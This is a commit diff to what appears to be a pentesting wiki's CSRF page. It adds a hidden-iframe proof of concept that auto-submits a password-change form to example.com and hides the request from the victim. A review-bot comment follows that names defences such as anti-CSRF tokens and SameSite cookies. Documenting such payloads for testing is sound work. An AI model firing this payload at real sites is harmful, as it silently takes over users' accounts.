GitBook: [master] one page modified
parent
85571317f2
commit
7113575a3e
@ -396,6 +396,26 @@ socket.on('connect', () => {
|
||||
</script>
|
||||
```
|
||||
|
||||
### Make POST Form request invisible with invisible Iframe
|
||||
|
||||
```markup
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
|
||||
<form action="https://example.com/admin/changepassword" method="POST" style="display:none" target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible" >
|
||||
<input type="hidden" name="password" value="hacktricks" />
|
||||
<input type="hidden" name="password2" value="hacktricks" />
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
```
|
||||
|
||||
## Tools <a id="tools"></a>
|
||||
|
||||
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
|
||||
|
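Review bot: The new "Make POST Form request invisible with invisible Iframe" section is a bare listing with no prose, so a reader cannot tell what the hidden iframe changes compared with the earlier form examples or which controls stop the request. I would add one sentence under the heading, for example `Targeting a hidden iframe keeps the response out of the top-level window; the request is still stopped by a per-request anti-CSRF token, SameSite=Lax/Strict session cookies, or requiring the current password on the change-password endpoint.` It is also worth noting there that frame-blocking response headers only prevent the response from rendering and do not undo a state change the server has already processed. The `generated by Burp Suite Professional` comment looks carried over from a template while the iframe and `target` attribute were presumably added by hand, so consider rewording or dropping it.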